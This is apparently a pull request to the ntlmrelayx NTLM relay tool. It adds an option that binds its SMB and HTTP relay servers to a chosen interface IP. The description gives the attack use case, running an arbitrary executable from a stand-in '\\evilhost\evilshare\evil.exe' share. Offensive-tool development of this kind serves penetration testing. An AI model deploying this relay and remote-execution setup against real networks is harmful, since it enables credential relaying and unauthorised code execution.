### PR TITLE
Update ntlmrelayx to support IP address specification

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -338,6 +338,8 @@ class MSSQLAttack(Thread):
 if __name__ == '__main__':
 
     RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
+#    RELAY_SERVERS = ( SMBRelayServer, SMBRelayServer )
+
     ATTACKS = { 'SMB': SMBAttack, 'LDAP': LDAPAttack, 'HTTP': HTTPAttack, 'MSSQL': MSSQLAttack, 'IMAP': IMAPAttack}
     # Init the example's logger theme
     logger.init()
@@ -359,6 +361,10 @@ if __name__ == '__main__':
     parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient/mssqlclient console instead'
                         'of executing a command after a successful relay. This console will listen locally on a '
                         ' tcp port and can be reached with for example netcat.')    
+    # Interface address specification
+    parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '
+                  'bind SMB and HTTP servers',default='0.0.0.0')
+
     parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection (HTTP server only)')
     parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
     parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '
@@ -472,6 +478,7 @@ if __name__ == '__main__':
         c.setMSSQLOptions(options.query)
         c.setInteractive(options.interactive)
         c.setIMAPOptions(options.keyword,options.mailbox,options.all,options.imap_max)
+        c.setInterfaceIp(options.interface_ip)
 
         #If the redirect option is set, configure the HTTP server to redirect targets to SMB
         if server is HTTPRelayServer and options.r is not None:

--- a/impacket/examples/ntlmrelayx/servers/httprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/httprelayserver.py
@@ -32,6 +32,7 @@ from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor
 from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections
 
 class HTTPRelayServer(Thread):
+
     class HTTPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
         def __init__(self, server_address, RequestHandlerClass, config):
             self.config = config
@@ -333,7 +334,9 @@ class HTTPRelayServer(Thread):
 
     def run(self):
         logging.info("Setting up HTTP Server")
-        httpd = self.HTTPServer(("", 80), self.HTTPHandler, self.config)
+
+        # changed to read from the interfaceIP set in the configuration
+        httpd = self.HTTPServer((self.config.interfaceIp, 80), self.HTTPHandler, self.config)
         try:
              httpd.serve_forever()
         except KeyboardInterrupt:

--- a/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
@@ -64,14 +64,18 @@ class SMBRelayServer(Thread):
         smbConfig.set('IPC$','share type','3')
         smbConfig.set('IPC$','path','')
 
-        self.server = SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
+        # changed to dereference configuration interfaceIp
+        self.server = SMBSERVER((config.interfaceIp,445), config_parser = smbConfig)
+
         self.server.processConfigFile()
 
         self.origSmbComNegotiate = self.server.hookSmbCommand(smb.SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
         self.origSmbSessionSetupAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX, self.SmbSessionSetupAndX)
         # Let's use the SMBServer Connection dictionary to keep track of our client connections as well
         #TODO: See if this is the best way to accomplish this
-        self.server.addConnection('SMBRelay', '0.0.0.0', 445)
+
+        # changed to dereference configuration interfaceIp
+        self.server.addConnection('SMBRelay', config.interfaceIp, 445)
 
     def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
         connData = smbServer.getConnectionData(connId, checkStatus = False)

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -15,7 +15,12 @@
 # command line, this can be passed to the tools' servers and clients
 class NTLMRelayxConfig:
     def __init__(self):
+
         self.daemon = True
+
+        # Set the value of the interface ip address
+        self.interfaceIp = None
+
         self.domainIp = None
         self.machineAccount = None
         self.machineHashes = None
@@ -40,6 +45,9 @@ class NTLMRelayxConfig:
 
         #MSSQL options
         self.queries = []
+
+    def setInterfaceIp(self, ip):
+        self.interfaceIp = ip
 
     def setRunSocks(self, socks):
         self.runSocks = socks


### PR DESCRIPTION
# Purpose

This pull request enables the user to specify an IP address at the command line that the SMB and HTTP servers will be bound to during execution. The screen capture below illustrates how this works in action. See the section labeled _Justification_ for clarification on what's actually happening.

![SCap: Illustrating Execution of Modified ntlmrelayx.py](https://user-images.githubusercontent.com/11574161/34692832-765a0c42-f48f-11e7-8095-f701f4752c59.png)

# Justification

In short: [interface aliasing](https://wiki.debian.org/NetworkConfiguration#Multiple_IP_addresses_on_one_Interface). This modification enables one to alias a given network interface with a second IP address so that a regular SMB server can run alongside ntlmrelayx.py.

At length: A preferred method of execution is to host an executable on a SMB share with world readable permissions. This allows one to execute an arbitrary file at the command line by running ```\\evilhost\evilshare\evil.exe```. This approach has both pros and cons but is dependable in the appropriate environment.

# Modifications

The changes were simple:
- Update the ```NTLMRelayxConfig``` class with an attribute to hold the specified IP address
- Add an option was added to the ntlmrelayx interface to capture the address at command line
- Update ```__init__()``` in both ```HTTPRelayServer``` and ```SMBRelayServer```  to make use of the new configuration

# Notes

- I don't make many pull requests so I likely did something screwy. Feel free to ping me with questions/concerns/beatings.